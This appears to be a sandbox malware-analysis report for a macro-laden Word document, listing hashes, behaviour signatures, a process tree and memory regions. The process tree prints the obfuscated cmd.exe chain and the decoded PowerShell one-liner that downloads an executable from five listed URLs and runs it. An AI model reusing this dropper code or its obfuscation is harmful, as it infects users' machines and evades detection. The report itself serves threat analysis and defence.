Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21/09/2024, 01:43

General

  • Target

    eed652a394cfa0bf878eb4f339afab5c_JaffaCakes118.doc

  • Size

    200KB

  • MD5

    eed652a394cfa0bf878eb4f339afab5c

  • SHA1

    bd65ee68bf93e5034792bed09aa5be126bcee540

  • SHA256

    5dcb15c147742a5321da1d0fbfa30d0d037ec424a6fdf5661ab94e54fda59acb

  • SHA512

    baa66cab34764366d82f25884551d028ff1ae2a9a7d5b1c745c040848607e6dde3f809da44f526751bced13146d2740626df29f8f3a22fe81f70692f74a2435a

  • SSDEEP

    6144:XgULVG5HGJG1VqDTQpzAiXajJ7qxPmdvm:XtG0IbzvX2qxA

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://hawkinscs.com/uBmDMGkJ

exe.dropper

http://hydrocarbonreports.com/0

exe.dropper

http://grupovisionpr.com/GJjBPh

exe.dropper

http://ajx3.com/akDJlHl

exe.dropper

http://kazak.zendo.in.ua/7G4P

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eed652a394cfa0bf878eb4f339afab5c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2616
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1532
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c f^OR ; /^f , " delims=fo2XA tokens= 1 " , ; %^W , iN , ( , ; ' ; ; ^^FT^^yPe ; ^| ; FIN^^d^^S^^Tr , d^^f^^i ' ; ) ; do ; %^W; , yr2eOFUzM/^Vj^]N^j~a0p ; Jq9nYIeM/R " , ( (^SeT _^ =:Xw\=C pd^G^,i^3^(t5^c4DH^)h0^kg^an7}^z^.oFjs^yW'rN-ZS$^;^+b^@xM^e^JB{v^u^mlf^P/) )&& ; , fO^R , ; %^G ; ; ^IN , ( ^7^ +31 ^2^ ^ 50 ^ ^3^8 ^3^4^ 21 +5^0^ 5^7 ^+57 6^ 43^ ^2^3 59 3^4 ^4^ ^26^ ^ 50 ^ 2^ ^ ^40 ^ 31^ ; 46 ^33 5^0 ^ 1^6 ^ 14^ ^ ^;^ ;^ ^6 39 ^; 5^0 14 +3^0 ^ 36^ ^ 50^ ^ ^ 46 ^ 5 ^ 57 ^ ^11 ^ ^50^ ^26 14 44 ^ 43 ^2 58 ^ ,^ ^7^ ^4^ 37 ^ 21 ^ ^14^ 1^4 ^; 7^ ^0 60 ^+^60 ^21 ^25^ 2 , ^ ^,^ ^ 2^3^ ^ ^11 ; ^ 2^6 ^ 34^ ^; ; 16 ^ 3^4 ^, , +3^0 +16 ^ 31 ^ ^56 ^60 ^ 55 +52 5^6 ^ 1^8^ ^ ^49 9 ; 23 5^1 4^7 ^ 2^1^ 14 1^4 ^;^ ^ 7 ^ ^ 0 ^+60 60 ^ ^+21 3^5^ ^8 ^ 38 31 ^ +1^6 ^ 25^ ^3^8^ 46 ^ ^+31^ ^ ,^ ^,^ ^26 38^ ^ 50 7 ^ ^3^1 38 +14 ^34 ^+3^0 ;^ ^16 3^1 ^ ^56^ ,^ , 60^ ^ , 2^2^ 47 ^2^1 ^ 14 , ^14^ ^ 7^ 0 ^ +60 ^, ^ ^,^ 6^0 +^2^4 38^ ^ ^55 ; +7 3^1 ^ ^ ^; ^54^ ;^ ^ 11 ^ ^+34^ 11 3^1^ 26 ^7^ ^ +^38 30 16 3^1 ^ +^5^6^ , ^6^0 9^ ^ 51 33 +52 5^9^ ^, , ^21^ ^+4^7 ^ 2^1 1^4 ^14 ^7 ^ ^0 , 60 ;^ ^ +^60 , 2^5^ ^ 33^ ^ 48 +12 ^ 3^0 ^ 16 3^1 ^56 6^0 ,^ ^ , ^ 25 ^ ^23^ ^18 51 57 19^ ^ ; 57 ^47 21^ ^14 ^ ^ ^+14 7 0^ 6^0 ^ 6^0 23^ ^25 2^9^ ^25 ^ 23^ ^ ^30 ^ 29 ^ 50 26 ^ ^ ^8 +3^1 30^ ^; 11 26 +30 +55^ 25 ^+60 27 9 ^ 17^ 5^9 ^3^7 30^ 42 +^7 ^57 ^ 1^1 ^;^ 14 ^ +13 ^37 ^ ^ ;^ ^; ^47 ^37 ^ ^20 4^4 43 33 ,^ ^4^2 3^2 6 ; ; ^ 4 6 ^37 +15 ^; 12 ^15 37 ^ 44 43^ +4^1^ ^ 31 +1^ 4 , +^43 50^ ;^ ^26^ ^+54 0 ^; 1^4^ ^50 ^; ^ ^5^6^ 7 ^+45 3^7 3 ^+37^ 45 ^ 4^3 ^33 42^ 3^2 ^ 4^5 ^+^37 3^0 ^ 50^ ^4^8 +50^ ^ +37^ ,^ 44 +^5^8^ ^ ^ 3^1^ 3^8^ ^ 50^ +25 ; ^ ; ^ ^16 ^ 21 ; ^ ^13 ^,^ ^43 ^ 4^9 39 ^, ^ , +54 6 , +1^1 ^ 26 6^ 43^ 2 ^58 ^7 20^ 53^ 14 ^+^38^ ^35 53^ ^43^ 23 , ^ ^, ^59 34 ^; ^ 30^ 18^ +^31^ 2^ ^26 57^ 31 , ^,^ 25^ ^ 8 ^ 3^2 ^1^1 ;^ ^ 5^7^ 5^0^ ^ 1^3 43^ 4^9^ ^ 39 54 ^ , ^ ^1^0 , ^ 6 4^3 ^41 ^ ; ^; 31 1 ^; ; +20^ ; ^ 44 42 ^ , ^ ^ 1^4 ^25^ ^ ^+38 ^ 14 ^ ; ^; ^ ^40 59^ ^ 38 ^31 ^ 16 ^ ^50 +^34 ^+34^ 6^ +^43 41^ ^ 31 1 ^44^ ^46^ 3^8 ^ ^50 ^25 ^23 ^ ^; ;^ ^44 2^8 ^;^ ^ ;^ ^16 ^,^ 25 14 ^ ^16 2^1 ^ 53 +28 ^28 ^+6 6^ ^ ^ ^6 ^ 6 ^6 ^ ^6 ^,^ , ^ 6 6 ^6^ ^ +6 ,^ ^6^ +^6^ ^6 ^6 ^ +6 6^ 6 71) , D^o (^SEt ^} ^ =!^} ^ !!_^ :~ %^G, 1!)& , ; ^If ; ; %^G ; =^= ; , ^7^1 ; , (c^ALL ; %^} ^ :^~^ -35^8%) "
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ^FT^yPe | FIN^d^S^Tr d^f^i
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1160
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" FTyPe "
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2836
          • C:\Windows\SysWOW64\findstr.exe
            FINdSTr dfi
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2868
        • C:\Windows\SysWOW64\cmd.exe
          cmd ; , yr2eOFUzM/Vj]Nj~a0p ; Jq9nYIeM/R " , ( (^SeT _^ =:Xw\=C pd^G^,i^3^(t5^c4DH^)h0^kg^an7}^z^.oFjs^yW'rN-ZS$^;^+b^@xM^e^JB{v^u^mlf^P/) )&& ; , fO^R , ; %^G ; ; ^IN , ( ^7^ +31 ^2^ ^ 50 ^ ^3^8 ^3^4^ 21 +5^0^ 5^7 ^+57 6^ 43^ ^2^3 59 3^4 ^4^ ^26^ ^ 50 ^ 2^ ^ ^40 ^ 31^ ; 46 ^33 5^0 ^ 1^6 ^ 14^ ^ ^;^ ;^ ^6 39 ^; 5^0 14 +3^0 ^ 36^ ^ 50^ ^ ^ 46 ^ 5 ^ 57 ^ ^11 ^ ^50^ ^26 14 44 ^ 43 ^2 58 ^ ,^ ^7^ ^4^ 37 ^ 21 ^ ^14^ 1^4 ^; 7^ ^0 60 ^+^60 ^21 ^25^ 2 , ^ ^,^ ^ 2^3^ ^ ^11 ; ^ 2^6 ^ 34^ ^; ; 16 ^ 3^4 ^, , +3^0 +16 ^ 31 ^ ^56 ^60 ^ 55 +52 5^6 ^ 1^8^ ^ ^49 9 ; 23 5^1 4^7 ^ 2^1^ 14 1^4 ^;^ ^ 7 ^ ^ 0 ^+60 60 ^ ^+21 3^5^ ^8 ^ 38 31 ^ +1^6 ^ 25^ ^3^8^ 46 ^ ^+31^ ^ ,^ ^,^ ^26 38^ ^ 50 7 ^ ^3^1 38 +14 ^34 ^+3^0 ;^ ^16 3^1 ^ ^56^ ,^ , 60^ ^ , 2^2^ 47 ^2^1 ^ 14 , ^14^ ^ 7^ 0 ^ +60 ^, ^ ^,^ 6^0 +^2^4 38^ ^ ^55 ; +7 3^1 ^ ^ ^; ^54^ ;^ ^ 11 ^ ^+34^ 11 3^1^ 26 ^7^ ^ +^38 30 16 3^1 ^ +^5^6^ , ^6^0 9^ ^ 51 33 +52 5^9^ ^, , ^21^ ^+4^7 ^ 2^1 1^4 ^14 ^7 ^ ^0 , 60 ;^ ^ +^60 , 2^5^ ^ 33^ ^ 48 +12 ^ 3^0 ^ 16 3^1 ^56 6^0 ,^ ^ , ^ 25 ^ ^23^ ^18 51 57 19^ ^ ; 57 ^47 21^ ^14 ^ ^ ^+14 7 0^ 6^0 ^ 6^0 23^ ^25 2^9^ ^25 ^ 23^ ^ ^30 ^ 29 ^ 50 26 ^ ^ ^8 +3^1 30^ ^; 11 26 +30 +55^ 25 ^+60 27 9 ^ 17^ 5^9 ^3^7 30^ 42 +^7 ^57 ^ 1^1 ^;^ 14 ^ +13 ^37 ^ ^ ;^ ^; ^47 ^37 ^ ^20 4^4 43 33 ,^ ^4^2 3^2 6 ; ; ^ 4 6 ^37 +15 ^; 12 ^15 37 ^ 44 43^ +4^1^ ^ 31 +1^ 4 , +^43 50^ ;^ ^26^ ^+54 0 ^; 1^4^ ^50 ^; ^ ^5^6^ 7 ^+45 3^7 3 ^+37^ 45 ^ 4^3 ^33 42^ 3^2 ^ 4^5 ^+^37 3^0 ^ 50^ ^4^8 +50^ ^ +37^ ,^ 44 +^5^8^ ^ ^ 3^1^ 3^8^ ^ 50^ +25 ; ^ ; ^ ^16 ^ 21 ; ^ ^13 ^,^ ^43 ^ 4^9 39 ^, ^ , +54 6 , +1^1 ^ 26 6^ 43^ 2 ^58 ^7 20^ 53^ 14 ^+^38^ ^35 53^ ^43^ 23 , ^ ^, ^59 34 ^; ^ 30^ 18^ +^31^ 2^ ^26 57^ 31 , ^,^ 25^ ^ 8 ^ 3^2 ^1^1 ;^ ^ 5^7^ 5^0^ ^ 1^3 43^ 4^9^ ^ 39 54 ^ , ^ ^1^0 , ^ 6 4^3 ^41 ^ ; ^; 31 1 ^; ; +20^ ; ^ 44 42 ^ , ^ ^ 1^4 ^25^ ^ ^+38 ^ 14 ^ ; ^; ^ ^40 59^ ^ 38 ^31 ^ 16 ^ ^50 +^34 ^+34^ 6^ +^43 41^ ^ 31 1 ^44^ ^46^ 3^8 ^ ^50 ^25 ^23 ^ ^; ;^ ^44 2^8 ^;^ ^ ;^ ^16 ^,^ 25 14 ^ ^16 2^1 ^ 53 +28 ^28 ^+6 6^ ^ ^ ^6 ^ 6 ^6 ^ ^6 ^,^ , ^ 6 6 ^6^ ^ +6 ,^ ^6^ +^6^ ^6 ^6 ^ +6 6^ 6 71) , D^o (^SEt ^} ^ =!^} ^ !!_^ :~ %^G, 1!)& , ; ^If ; ; %^G ; =^= ; , ^7^1 ; , (c^ALL ; %^} ^ :^~^ -35^8%) "
          3⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:864
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell $kPs=new-object Net.WebClient;$wfp='http://hawkinscs.com/uBmDMGkJ@http://hydrocarbonreports.com/0@http://grupovisionpr.com/GJjBPh@http://ajx3.com/akDJlHl@http://kazak.zendo.in.ua/7G4P'.Split('@');$jSF = '535';$ZoX=$env:temp+'\'+$jSF+'.exe';foreach($MNv in $wfp){try{$kPs.DownloadFile($MNv, $ZoX);Start-Process $ZoX;break;}catch{}}
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2572

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      f732f5df908c13ca1b514b629c872e7a

      SHA1

      d1d42956f7e86f366325dd167c7f0be08066e0a0

      SHA256

      6ef61a7df08d1f175e9b3a2969234eb6123446263128b6e4ec08b46bce7b574d

      SHA512

      512b3cf90eb79ad1d392c61a8c9aef3e7fb91c3ea39f85768a16074d1545de95852bc494a0c55a7ee63716e41bc888b2c9a36a3d914cd9ef22b6fc5257a6bbe7

    • memory/2616-0-0x000000002FAB1000-0x000000002FAB2000-memory.dmp

      Filesize

      4KB

    • memory/2616-2-0x000000007117D000-0x0000000071188000-memory.dmp

      Filesize

      44KB

    • memory/2616-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2616-12-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-11-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-241-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-213-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-198-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-44-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-43-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-41-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-40-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-38-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-37-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-35-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-34-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-32-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-30-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-29-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-27-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-26-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-24-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-23-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-20-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-17-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-16-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-9-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-66-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-8-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-7-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-5-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-42-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-39-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-36-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-33-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-31-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-28-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-25-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-22-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-21-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-19-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-18-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-15-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-14-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-13-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-10-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-6-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-4-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-340-0x000000007117D000-0x0000000071188000-memory.dmp

      Filesize

      44KB

    • memory/2616-341-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2616-357-0x000000007117D000-0x0000000071188000-memory.dmp

      Filesize

      44KB